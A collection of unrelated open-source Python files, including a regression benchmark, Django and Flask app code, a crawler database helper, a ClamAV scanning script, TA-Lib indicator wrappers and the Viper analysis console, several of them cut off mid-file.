mean = X_train.mean(axis=0)
X_train = (X_train - mean) / std
X_test = (X_test - mean) / std
std = y_train.std(axis=0)
mean = y_train.mean(axis=0)
y_train = (y_train - mean) / std
y_test = (y_test - mean) / std
gc.collect()
print("- benching ElasticNet")
clf = ElasticNet(alpha=alpha, rho=0.5, fit_intercept=False)
tstart = time()
clf.fit(X_train, y_train)
elnet_results[i, j, 0] = mean_squared_error(clf.predict(X_test),
y_test)
elnet_results[i, j, 1] = time() - tstart
gc.collect()
print("- benching SGD")
n_iter = np.ceil(10 ** 4.0 / n_train)
clf = SGDRegressor(alpha=alpha, fit_intercept=False,
n_iter=n_iter, learning_rate="invscaling",
eta0=.01, power_t=0.25)
tstart = time()
clf.fit(X_train, y_train)
sgd_results[i, j, 0] = mean_squared_error(clf.predict(X_test),
y_test)
sgd_results[i, j, 1] = time() - tstart
gc.collect()
print("- benching RidgeRegression")
clf = Ridge(alpha=alpha, fit_intercept=False)
tstart = time()
clf.fit(X_train, y_train)
ridge_results[i, j, 0] = mean_squared_error(clf.predict(X_test),
y_test)
ridge_results[i, j, 1] = time() - tstart
# Plot results
i = 0
m = len(list_n_features)
pl.figure(figsize=(5 * 2, 4 * m))
for j in range(m):
pl.subplot(m, 2, i + 1)
pl.plot(list_n_samples, np.sqrt(elnet_results[:, j, 0]),
label="ElasticNet")
pl.plot(list_n_samples, np.sqrt(sgd_results[:, j, 0]),
label="SGDRegressor")
pl.plot(list_n_samples, np.sqrt(ridge_results[:, j, 0]),
label="Ridge")
pl.legend(prop={"size": 10})
pl.xlabel("n_train")
pl.ylabel("RMSE")
pl.title("Test error - %d features" % list_n_features[j])
i += 1
pl.subplot(m, 2, i + 1)
pl.plot(list_n_samples, np.sqrt(elnet_results[:, j, 1]),
label="ElasticNet")
pl.plot(list_n_samples, np.sqrt(sgd_results[:, j, 1]),
label="SGDRegressor")
pl.plot(list_n_samples, np.sqrt(ridge_results[:, j, 1]),
label="Ridge")
pl.legend(prop={"size": 10})
pl.xlabel("n_train")
pl.ylabel("Time [sec]")
pl.title("Training time - %d features" % list_n_features[j])
i += 1
pl.subplots_adjust(hspace=.30)
pl.show()
|
srijannnd/Login-and-Register-App-in-Django
|
simplesocial/posts/models.py
|
Python
|
mit
| 984
| 0.003049
|
from django.db import models
from django.core.urlresolvers import reverse
from django.conf import settings
import misaka
from groups.models import Group
# Create your models here.
# POSTS MODELS.PY
from django.contrib.auth import get_user_model
User = get_user_model()
class Post(models.Model):
user = models.ForeignKey(User, related_name='posts')
created_at = models.DateTimeField(auto_now=True)
message = models.TextField()
message_html = models.TextField(editable=False)
    group = models.ForeignKey(Group, related_name='posts', null=True, blank=True)
def __str__(self):
return self.message
def save(self, *args, **kwargs):
self.message_html = misaka.html(self.message)
super().save(*args, **kwargs)
def get_absolute_url(self):
        return reverse('posts:single', kwargs={'username': self.user.username, 'pk': self.pk})
class Meta:
ordering = ['-created_at']
unique_together = ['user', 'message']
|
google/google-ctf
|
third_party/edk2/BaseTools/Source/Python/GenFds/CompressSection.py
|
Python
|
apache-2.0
| 3,896
| 0.009497
|
## @file
# process compress section generation
#
#  Copyright (c) 2007 - 2017, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
#  which accompanies this distribution.  The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
from __future__ import absolute_import
from .Ffs import SectionSuffix
from . import Section
import subprocess
import Common.LongFilePathOs as os
from .GenFdsGlobalVariable import GenFdsGlobalVariable
from CommonDataClass.FdfClass import CompressSectionClassObject
from Common.DataType import *
## generate compress section
#
#
class CompressSection (CompressSectionClassObject) :
## compress types: PI standard and non PI standard
CompTypeDict = {
'PI_STD' : 'PI_STD',
'PI_NONE' : 'PI_NONE'
}
## The constructor
#
# @param self The object pointer
#
def __init__(self):
CompressSectionClassObject.__init__(self)
## GenSection() method
#
# Generate compressed section
#
# @param self The object pointer
# @param OutputPath Where to place output file
# @param ModuleName Which module this section belongs to
# @param SecNum Index of section
# @param KeyStringList Filter for inputs of section generation
# @param FfsInf FfsInfStatement object that contains this section data
# @param Dict dictionary contains macro and its value
# @retval tuple (Generated file name, section alignment)
#
def GenSection(self, OutputPath, ModuleName, SecNum, KeyStringList, FfsInf = None, Dict = {}, IsMakefile = False):
if FfsInf is not None:
self.CompType = FfsInf.__ExtendMacro__(self.CompType)
self.Alignment = FfsInf.__ExtendMacro__(self.Alignment)
SectFiles = tuple()
SectAlign = []
Index = 0
MaxAlign = None
for Sect in self.SectionList:
Index = Index + 1
SecIndex = '%s.%d' %(SecNum, Index)
ReturnSectList, AlignValue = Sect.GenSection(OutputPath, ModuleName, SecIndex, KeyStringList, FfsInf, Dict, IsMakefile=IsMakefile)
if AlignValue is not None:
if MaxAlign is None:
MaxAlign = AlignValue
if GenFdsGlobalVariable.GetAlignment (AlignValue) > GenFdsGlobalVariable.GetAlignment (MaxAlign):
MaxAlign = AlignValue
if ReturnSectList != []:
if AlignValue is None:
AlignValue = "1"
for FileData in ReturnSectList:
SectFiles += (FileData,)
SectAlign.append(AlignValue)
OutputFile = OutputPath + \
os.sep + \
ModuleName + \
SUP_MODULE_SEC + \
SecNum + \
SectionSuffix['COMPRESS']
OutputFile = os.path.normpath(OutputFile)
DummyFile = OutputFile + '.dummy'
GenFdsGlobalVariable.GenerateSection(DummyFile, SectFiles, InputAlign=SectAlign, IsMakefile=IsMakefile)
GenFdsGlobalVariable.GenerateSection(OutputFile, [DummyFile], Section.Section.SectionType['COMPRESS'],
CompressionType=self.CompTypeDict[self.CompType], IsMakefile=IsMakefile)
OutputFileList = []
OutputFileList.append(OutputFile)
return OutputFileList, self.Alignment
|
JaySon-Huang/WebModel
|
WebModel/database/databasehelper.py
|
Python
|
mit
| 4,676
| 0.032
|
# -*- coding: utf-8 -*-
import sqlite3
VERBOSE = 0
CTABLE_DOMAIN = '''
CREATE TABLE IF NOT EXISTS Domains(
did INTEGER PRIMARY KEY AUTOINCREMENT,
domain VARCHAR(64) UNIQUE,
indegree INTEGER,
outdegree INTEGER
)'''
CTABLE_WEBSITE = '''
CREATE TABLE IF NOT EXISTS Websites(
wid INTEGER PRIMARY KEY AUTOINCREMENT,
did INTEGER,
url VARCHAR(256) NOT NULL UNIQUE,
title VARCHAR(100),
visited bit,
FOREIGN KEY (did) REFERENCES Domains(did)
)'''
CTABLE_RULESETS = '''
CREATE TABLE IF NOT EXISTS Rulesets(
rid INTEGER PRIMARY KEY AUTOINCREMENT,
did INTEGER,
rules VARCHAR(512),
FOREIGN KEY (did) REFERENCES Domains(did)
)'''
class DatabaseHelper(object):
def __init__(self):
        '''Create the tables.'''
self.conn = sqlite3.connect("./items.db")
if VERBOSE:
print 'Database connection OPEN.'
        # Domains table
self.conn.execute(CTABLE_DOMAIN)
        # Websites table
self.conn.execute(CTABLE_WEBSITE)
        # Rulesets table
self.conn.execute(CTABLE_RULESETS)
self.conn.commit()
if VERBOSE:
cur = self.conn.cursor()
print 'Tables:',cur.execute("SELECT name FROM sqlite_master WHERE type = 'table'").fetchall()
def close(self):
        '''Close the database connection.'''
if VERBOSE:
print 'Database connection CLOSE.'
self.conn.close()
def insertDomain(self, domain, indegree=0, outdegree=0):
        '''Insert a domain record.'''
cur = self.conn.cursor()
cur.execute("INSERT INTO Domains VALUES (NULL,?,?,?)", (domain, indegree, outdegree))
        # Commit the change to the database file
self.conn.commit()
def insertRuleset(self, ruleset, domain):
        '''Insert a robots.txt ruleset for a domain.'''
cur = self.conn.cursor()
cur.execute("SELECT did FROM Domains WHERE domain=?", (domain,))
did = cur.fetchone()[0]
cur.execute("INSERT INTO Rulesets VALUES (NULL,?,?)",(did, ruleset))
        # Commit the change to the database file
self.conn.commit()
def insertWebsite(self, url, domain):
        '''Insert a website, mark it as unvisited, and increase the in-degree of its domain.'''
cur = self.conn.cursor()
cur.execute("SELECT 1 FROM Domains WHERE domain=?", (domain,))
result = cur.fetchone()
if not result:
            # No record for this domain yet: create it first with in-degree 1
if VERBOSE:
print 'Spot Domain:',domain
self.insertDomain(domain, indegree=1)
cur.execute("SELECT did FROM Domains WHERE domain=?", (domain,))
did = cur.fetchone()[0]
else:
did = result[0]
            # The domain record already exists: increment its in-degree
cur.execute("UPDATE Domains SET outdegree=outdegree+1 WHERE domain=?", (domain,))
cur.execute("INSERT INTO Websites VALUES (NULL,?,?,NULL,0)", (did, url,))
        # Commit the change to the database file
self.conn.commit()
def updateInfo(self, item, newlinks, oldlinks):
        '''Update the database contents after the crawler has finished a page.'''
cur = self.conn.cursor()
cur.execute("SELECT wid,did FROM Websites WHERE url=?", (item['url'],))
wid, did = cur.fetchone()
        # Update the website record
cur.execute("UPDATE Websites SET title=?,visited=1 WHERE wid=?", (item['title'], wid,))
        # The out-degree of the corresponding domain record also needs updating
cur.execute("UPDATE Domains SET outdegree=outdegree+? WHERE did=?", (len(item['links']), did,))
        # Update the records for every link found on this page
        # Links the caller has determined to be new
for link,domain in newlinks:
self.insertWebsite(link, domain)
        # Links the caller has determined to be already known
for link,domain in oldlinks:
            # Increase the in-degree of the corresponding domain record
cur.execute("UPDATE Domains SET outdegree=outdegree+1 WHERE domain=?", (domain,))
        # Commit the change to the database file
self.conn.commit()
def robotsrulesetOfDomain(self, domain):
        '''Check whether the domain is in the database.
        No  --> (False, None)
        Yes --> (True, the robots.txt rules stored in the database)
'''
exist = False
cur = self.conn.cursor()
        # Does the domain exist?
cur.execute("SELECT 1 FROM Domains WHERE domain=?", (domain,))
if cur.fetchone() :
exist = True
        # If it exists, fetch the stored rules
cur.execute("SELECT rules FROM Domains,Rulesets "
"WHERE domain=? AND Domains.did=Rulesets.did"
,(domain,) )
ruleset = cur.fetchone()
return (exist, ruleset)
def rollback(self):
self.conn.rollback()
def showAll(self):
self.conn.commit()
cur = self.conn.cursor()
cur.execute("SELECT * FROM Domains")
print cur.fetchall()
cur.execute("SELECT * FROM Websites")
print cur.fetchall()
_dbcli = None
def getCliInstance():
global _dbcli
if not _dbcli:
_dbcli = DatabaseHelper()
return _dbcli
def test():
dbcli = getCliInstance()
    # dbcli.insertDomain('jaysonhwang.com')
# dbcli.insertRuleset('test','jaysonhwang.com')
print dbcli.robotsrulesetOfDomain('www.zol.com')
    print dbcli.robotsrulesetOfDomain('jayson.com')
dbcli.showAll()
dbcli.close()
if __name__ == '__main__':
test()
|
artefactual/archivematica-history
|
src/MCPClient/lib/clientScripts/archivematicaClamscan.py
|
Python
|
agpl-3.0
| 2,652
| 0.003771
|
#!/usr/bin/python -OO
# This file is part of Archivematica.
#
# Copyright 2010-2012 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
# @package Archivematica
# @subpackage archivematicaClientScript
# @author Joseph Perry <joseph@artefactual.com>
# @version svn: $Id$
#source /etc/archivematica/archivematicaConfig.conf
import os
import sys
sys.path.append("/usr/lib/archivematica/archivematicaCommon")
from executeOrRunSubProcess import executeOrRun
from databaseFunctions import insertIntoEvents
from archivematicaFunctions import escapeForCommand
clamscanResultShouldBe="Infected files: 0"
if __name__ == '__main__':
fileUUID = sys.argv[1]
target = sys.argv[2]
date = sys.argv[3]
taskUUID = sys.argv[4]
command = 'clamdscan - <"' + escapeForCommand(target) + '"'
print >>sys.stderr, command
commandVersion = "clamdscan -V"
eventOutcome = "Pass"
clamscanOutput = executeOrRun("bashScript", command, printing=False)
clamscanVersionOutput = executeOrRun("command", commandVersion, printing=False)
if clamscanOutput[0] or clamscanVersionOutput[0]:
if clamscanVersionOutput[0]:
print >>sys.stderr, clamscanVersionOutput
exit(2)
else:
eventOutcome = "Fail"
if eventOutcome == "Fail" or clamscanOutput[1].find(clamscanResultShouldBe) == -1:
eventOutcome = "Fail"
print >>sys.stderr, fileUUID, " - ", os.path.basename(target)
print >>sys.stderr, clamscanOutput
version, virusDefs, virusDefsDate = clamscanVersionOutput[1].split("/")
virusDefs = virusDefs + "/" + virusDefsDate
eventDetailText = "program=\"Clam AV\"; version=\"" + version + "\"; virusDefinitions=\"" + virusDefs + "\""
if fileUUID != "None":
insertIntoEvents(fileUUID=fileUUID, eventIdentifierUUID=taskUUID, eventType="virus check", eventDateTime=date, eventDetail=eventDetailText, eventOutcome=eventOutcome, eventOutcomeDetailNote="")
if eventOutcome != "Pass":
exit(3)
|
sinomiko/project
|
python_project/python/PythonProj/ReadWriteFile.py
|
Python
|
bsd-3-clause
| 1,234
| 0.028363
|
outfile=open("helloworld.txt","w")
for num1 in range(1,10):
for num2 in range(1,10):
if num2<=num1 :
outfile.write("{}*{}={} ".format(num2, num1 ,num1 * num2))
    outfile.write(" \n")
outfile.flush()
outfile.close()
infile=open("helloworld.txt","r")
for line in infile.readlines():
print line
infile.close()
import sys
sys.stdout.write("foo\n")
sys.stderr.write("foo2 \n")
def test_var_kwargs(farg, **kwargs):
print "formal arg:", farg
for key in kwargs:
print "arg: {}:{}".format(key, kwargs[key])
test_var_kwargs(2,a="sd",b="ds")
def return_stuff(var):
return [1, 2,{'a':1, 'b':2},'string']
a=return_stuff(1)
print a
x=222
def t1():
global x
x=111
t1()
print x
import os
for ld in os.listdir("c:/Miko"):
print ld
print os.listdir("c:/Miko")
class Person(object):
def __init__(self, first_name, last_name):
self.first_name = first_name
self.last_name = last_name
def get_first_name(self):
return self.first_name
def set_first_name(self, new_name):
self.first_name = new_name
p = Person("John", "Smith")
#p.set_first_name("FooJohn")
print p.get_first_name()
print dir(p)[-4:]
class Single(object):
def __i
|
newhavenrc/nhrc2
|
tests/test_get_neighborhoods.py
|
Python
|
mit
| 1,060
| 0.007547
|
#!/usr/bin/env python
"""
PURPOSE: The routines in this file test the get_neighborhoods module.
Created on 2015-04-02T21:24:17
"""
from __future__ import division, print_function
#import numpy as np
#from types import *
#from nose.tools import raises
#import pandas as pd
import nhrc2.backend.read_seeclickfix_api_to_csv as rscf
from nhrc2.backend import get_neighborhoods as get_ngbrhd
__author__ = "Matt Giguere (github: @mattgiguere)"
__license__ = "MIT"
__version__ = '0.0.1'
__maintainer__ = "Matt Giguere"
__email__ = "matthew.giguere@yale.edu"
__status__ = " Development NOT(Prototype or Production)"
#make sure the number of neighborhoods is equal to the number of issues.
def test_get_neighborhoods():
"""
Ensure the number in the hood list length = the number of issues
"""
scf_cats = rscf.read_categories(readfile=True)
issues = rscf.read_issues(scf_cats, readfile=True)
hoods = get_ngbrhd.get_neighborhoods()
assert len(issues) == len(hoods)
#@raises(ValueError)
#def test_make_function_raise_value_error():
|
jackwluo/py-quantmod
|
quantmod/ta.py
|
Python
|
mit
| 33,467
| 0
|
"""Wrappers around Ta-Lib technical indicators
Python native indicators in 'tanolib.py' file.
"""
import numpy as np
import pandas as pd
import talib
from . import utils
from .valid import VALID_TA_KWARGS
# Overlap studies
def add_MA(self, timeperiod=20, matype=0,
type='line', color='secondary', **kwargs):
"""Moving Average (customizable)."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'MA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.MA(self.df[self.cl].values,
timeperiod, matype)
def add_SMA(self, timeperiod=20,
type='line', color='secondary', **kwargs):
"""Simple Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'SMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.SMA(self.df[self.cl].values,
timeperiod)
def add_EMA(self, timeperiod=26,
type='line', color='secondary', **kwargs):
"""Exponential Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'EMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.EMA(self.df[self.cl].values,
timeperiod)
def add_WMA(self, timeperiod=20,
type='line', color='secondary', **kwargs):
"""Weighted Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'WMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.WMA(self.df[self.cl].values,
timeperiod)
def add_DEMA(self, timeperiod=26,
type='line', color='secondary', **kwargs):
"""Double Exponential Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'DEMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.DEMA(self.df[self.cl].values,
timeperiod)
def add_TEMA(self, timeperiod=26,
type='line', color='secondary', **kwargs):
"""Triple Moving Exponential Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'TEMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.TEMA(self.df[self.cl].values,
timeperiod)
def add_T3(self, timeperiod=20, vfactor=0.7,
type='line', color='secondary', **kwargs):
"""T3 Exponential Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'T3({}, {})'.format(str(timeperiod), str(vfactor))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.T3(self.df[self.cl].values,
timeperiod, vfactor)
def add_KAMA(self, timeperiod=20,
type='line', color='secondary', **kwargs):
"""Kaufmann Adaptive Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'KAMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.KAMA(self.df[self.cl].values,
timeperiod)
def add_TRIMA(self, timeperiod=20,
type='line', color='secondary', **kwargs):
"""Triangular Moving Average."""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
name = 'TRIMA({})'.format(str(timeperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.TRIMA(self.df[self.cl].values,
timeperiod)
def add_MAMA(self, fastlimit=0.5, slowlimit=0.05,
types=['line', 'line'], colors=['secondary', 'tertiary'],
**kwargs):
"""MESA Adaptive Moving Average.
Note that the first argument of types and colors refers to MAMA while the
second argument refers to FAMA.
"""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
kwargs['type'] = kwargs['kind']
if 'kinds' in kwargs:
types = kwargs['type']
if 'type' in kwargs:
types = [kwargs['type']] * 2
if 'color' in kwargs:
colors = [kwargs['color']] * 2
mama = 'MAMA({},{})'.format(str(fastlimit), str(slowlimit))
fama = 'FAMA({},{})'.format(str(fastlimit), str(slowlimit))
self.pri[mama] = dict(type=types[0], color=colors[0])
self.pri[fama] = dict(type=types[1], color=colors[1])
self.ind[mama], self.ind[fama] = talib.MAMA(self.df[self.cl].values,
fastlimit, slowlimit)
def add_MAVP(self, periods, minperiod=2, maxperiod=30, matype=0,
type='line', color='secondary', **kwargs):
"""Moving Average with Variable Period.
Parameters
----------
periods : Series or array
Moving Average period over timeframe to analyze, as a 1-dimensional
shape of same length as chart.
"""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
type = kwargs['kind']
if isinstance(periods, pd.Series):
periods = periods.values
elif isinstance(periods, np.ndarray):
pass
else:
raise TypeError("Invalid periods {0}. "
"It should be Series or array."
.format(periods))
name = 'MAVP({},{})'.format(str(minperiod), str(maxperiod))
self.pri[name] = dict(type=type, color=color)
self.ind[name] = talib.MAVP(self.df[self.cl].values,
periods, minperiod, maxperiod, matype)
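# Illustrative sketch (not part of the original module): the add_* helpers above
# are meant to be bound to a quantmod Chart-like object exposing df, cl, pri,
# ind and has_close; the minimal stand-in below is a made-up stub used only to
# show the calling convention of add_SMA.
if __name__ == '__main__':
    class _FakeChart(object):
        add_SMA = add_SMA  # reuse the module-level helper as a method
        def __init__(self, frame):
            self.df = frame
            self.cl = 'close'
            self.has_close = True
            self.pri = {}
            self.ind = pd.DataFrame(index=frame.index)
    demo_df = pd.DataFrame({'close': np.random.randn(100).cumsum() + 100.0})
    chart = _FakeChart(demo_df)
    chart.add_SMA(timeperiod=10)
    print(chart.ind.tail())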
def add_BBANDS(self, timeperiod=20, nbdevup=2, nbdevdn=2, matype=0,
types=['line_dashed_thin', 'line_dashed_thin'],
colors=['tertiary', 'grey_strong'], **kwargs):
"""Bollinger Bands.
Note that the first argument of types and colors refers to upper and lower
bands while the second argument refers to the middle band. (Upper and lower are
symmetrical arguments, hence only 2 needed.)
"""
if not self.has_close:
raise Exception()
utils.kwargs_check(kwargs, VALID_TA_KWARGS)
if 'kind' in kwargs:
kwargs['type'] = kwargs['kind']
if 'kinds' in kwargs:
types = kwargs['type']
if 'type' in kwargs:
types = [kwargs['type']] * 2
if 'color' in kwargs:
colors = [kwargs['color']] * 2
name = 'BBANDS({},{},{})'.format(str(timeperiod),
str(nbdevup),
str(nbdevdn))
ubb = name + '[Upper]'
bb = name
lbb = name + '[Lower]'
self.pri[ubb] = dict(type='line_' + types[0][5:],
color=colors[0])
self.pri[bb] = dict(type='area_' + types[1][5:],
color=colors[1], fillcolor='fill')
self.pri[lbb] = dict(type='area_' + types[0][5:],
color=colors[0], fillcolor='fill')
(self.ind[ubb],
self.ind[bb],
self.ind[lbb]) = talib.BBANDS(self.df[self.cl].values,
|
andychase/classwork
|
cs496/assignment_3/test.py
|
Python
|
mit
| 2,361
| 0.000424
|
import json
import uuid
import unittest
from main import app
from app import redis
class FlaskTestCase(unittest.TestCase):
def setUp(self):
app.config['TESTING'] = True
self.app = app.test_client()
self.site_host = str(uuid.uuid4())
def tearDown(self):
pass # self.delete_site()
def make_site(self):
self.app.post('/site/new', data=dict(
site=self.site_host,
style="",
text="test",
x=0,
y=0
))
def delete_site(self):
self.app.delete('/site/delete/{}'.format(self.site_host))
def get_site_data(self):
response = self.app.get('/site/get/{}'.format(self.site_host))
site_data = json.loads(response.data.decode())
return site_data
def test_create_and_destroy_site(self):
def get_site_keys():
return set(redis.keys(self.site_host + '*'))
self.assertSetEqual(get_site_keys(), set())
self.make_site()
self.assertSetEqual(get_site_keys(), {
self.site_host,
self.site_host + "_1",
self.site_host + "_magnet_index",
})
self.assertSetEqual(set(redis.sscan_iter(self.site_host)), {"1"})
self.delete_site()
self.assertSetEqual(get_site_keys(), set())
def test_add_magnet(self):
self.make_site()
self.assertDictEqual(self.get_site_data(), {
'mags': [
dict(
style="",
text="test",
x=0,
y=0
)
],
'ok': True
})
def test_remove_magnet(self):
self.make_site()
self.app.delete('/mag/delete', data={
'site': self.site_host,
'mag_id': 1
})
self.assertDictEqual(self.get_site_data(), {
'mags': [],
'ok': True
})
def test_move_magnet(self):
self.make_site()
self.app.put(
'/mag/move',
data=dict(site=self.site_host, mag_id=1, x=10, y=10)
)
self.assertDictEqual(self.get_site_data(), {
'mags': [
{'style': '', 'text': 'test', 'x': 10, 'y': 10}
],
'ok': True
})
if __name__ == '__main__':
unittest.main()
|
cwtaylor/viper
|
viper/core/ui/console.py
|
Python
|
bsd-3-clause
| 9,307
| 0.002256
|
# This file is part of Viper - https://github.com/viper-framework/viper
# See the file 'LICENSE' for copying permission.
import os
from os.path import expanduser
import sys
import glob
import atexit
import readline
import traceback
from viper.common.out import print_error, print_output
from viper.common.colors import cyan, magenta, white, bold, blue
from viper.core.session import __sessions__
from viper.core.plugins import __modules__
from viper.core.project import __project__
from viper.core.ui.commands import Commands
from viper.core.database import Database
from viper.core.config import Config, console_output
cfg = Config()
# For python2 & 3 compat, a bit dirty, but it seems to be the least bad one
try:
input = raw_input
except NameError:
pass
def logo():
print(""" _
(_)
_ _ _ ____ _____ ____
| | | | | _ \| ___ |/ ___)
\ V /| | |_| | ____| |
\_/ |_| __/|_____)_| v1.3-dev
|_|
""")
db = Database()
count = db.get_sample_count()
try:
db.find('all')
except:
print_error("You need to update your Viper database. Run 'python update.py -d'")
sys.exit()
if __project__.name:
name = __project__.name
else:
name = 'default'
print(magenta("You have " + bold(count)) +
magenta(" files in your " + bold(name)) +
magenta(" repository"))
class Console(object):
def __init__(self):
# This will keep the main loop active as long as it's set to True.
self.active = True
self.cmd = Commands()
def parse(self, data):
root = ''
args = []
# Split words by white space.
words = data.split()
# First word is the root command.
root = words[0]
# If there are more words, populate the arguments list.
if len(words) > 1:
args = words[1:]
return (root, args)
def keywords(self, data):
# Check if $self is in the user input data.
if '$self' in data:
# Check if there is an open session.
if __sessions__.is_set():
# If a session is opened, replace $self with the path to
# the file which is currently being analyzed.
data = data.replace('$self', __sessions__.current.file.path)
else:
print("No open session")
return None
return data
def stop(self):
# Stop main loop.
self.active = False
def start(self):
# Logo.
logo()
# Setup shell auto-complete.
def complete(text, state):
# Try to autocomplete commands.
cmds = [i for i in self.cmd.commands if i.startswith(text)]
if state < len(cmds):
return cmds[state]
# Try to autocomplete modules.
mods = [i for i in __modules__ if i.startswith(text)]
if state < len(mods):
return mods[state]
# Then autocomplete paths.
if text.startswith("~"):
text = "{0}{1}".format(expanduser("~"), text[1:])
return (glob.glob(text+'*')+[None])[state]
# Auto-complete on tabs.
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind('tab: complete')
readline.set_completer(complete)
# Save commands in history file.
def save_history(path):
readline.write_history_file(path)
# If there is an history file, read from it and load the history
# so that they can be loaded in the shell.
# Now we are storing the history file in the local project folder
history_path = os.path.join(__project__.path, 'history')
if os.path.exists(history_path):
readline.read_history_file(history_path)
# Register the save history at program's exit.
atexit.register(save_history, path=history_path)
# Main loop.
while self.active:
# If there is an open session, we include the path to the opened
# file in the shell prompt.
# TODO: perhaps this block should be moved into the session so that
# the generation of the prompt is done only when the session's
# status changes.
prefix = ''
if __project__.name:
prefix = bold(cyan(__project__.name)) + ' '
if __sessions__.is_set():
stored = ''
filename = ''
if __sessions__.current.file:
filename = __sessions__.current.file.name
if not Database().find(key='sha256', value=__sessions__.current.file.sha256):
stored = magenta(' [not stored]', True)
misp = ''
if __sessions__.current.misp_event:
misp = '[MISP'
if __sessions__.current.misp_event.event.id:
misp += ' {}'.format(__sessions__.current.misp_event.event.id)
else:
misp += ' New Event'
if __sessions__.current.misp_event.off:
misp += ' (Offline)'
misp += ']'
prompt = (prefix + cyan('viper ', True) +
white(filename, True) + blue(misp, True) + stored + cyan(' > ', True))
# Otherwise display the basic prompt.
else:
prompt = prefix + cyan('viper > ', True)
# Wait for input from the user.
try:
data = input(prompt).strip()
except KeyboardInterrupt:
print("")
# Terminate on EOF.
except EOFError:
self.stop()
print("")
continue
# Parse the input if the user provided any.
else:
# If there are recognized keywords, we replace them with
# their respective value.
data = self.keywords(data)
# Skip if the input is empty.
if not data:
continue
# Check for output redirection
# If there is a > in the string, we assume the user wants to output to file.
if '>' in data:
data, console_output['filename'] = data.split('>')
print("Writing output to {0}".format(console_output['filename'].strip()))
# If the input starts with an exclamation mark, we treat the
# input as a bash command and execute it.
# At this point the keywords should be replaced.
if data.startswith('!'):
os.system(data[1:])
continue
# Try to split commands by ; so that you can sequence multiple
# commands at once.
# For example:
# viper > find name *.pdf; open --last 1; pdf id
# This will automatically search for all PDF files, open the first entry
# and run the pdf module against it.
split_commands = data.split(';')
for split_command in split_commands:
split_command = split_command.strip()
if not split_command:
continue
# If it's an internal command, we parse the input and split it
# between root command and arguments.
root, args = self.parse(split_command)
# Check if the command instructs to terminate.
if root in ('exit', 'quit'):
self.stop()
continue
try:
# If the root command is part of the embedded commands list we
# execute it.
if root in self.cmd.commands:
self.cmd.commands[root]['obj'](*args)
del(self.cmd.output[:])
|
blutjens/perc_neuron_ros_ur10
|
pn_ros/bjorn_ws/devel/lib/python2.7/dist-packages/rosserial_msgs/msg/_TopicInfo.py
|
Python
|
gpl-3.0
| 7,843
| 0.021293
|
"""autogenerated by genpy from rosserial_msgs/TopicInfo.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class TopicInfo(genpy.Message):
_md5sum = "0ad51f88fc44892f8c10684077646005"
_type = "rosserial_msgs/TopicInfo"
_has_header = False #flag to mark the presence of a Header object
_full_text = """# special topic_ids
uint16 ID_PUBLISHER=0
uint16 ID_SUBSCRIBER=1
uint16 ID_SERVICE_SERVER=2
uint16 ID_SERVICE_CLIENT=4
uint16 ID_PARAMETER_REQUEST=6
uint16 ID_LOG=7
uint16 ID_TIME=10
uint16 ID_TX_STOP=11
# The endpoint ID for this topic
uint16 topic_id
string topic_name
string message_type
# MD5 checksum for this message type
string md5sum
# size of the buffer message must fit in
int32 buffer_size
"""
# Pseudo-constants
ID_PUBLISHER = 0
ID_SUBSCRIBER = 1
ID_SERVICE_SERVER = 2
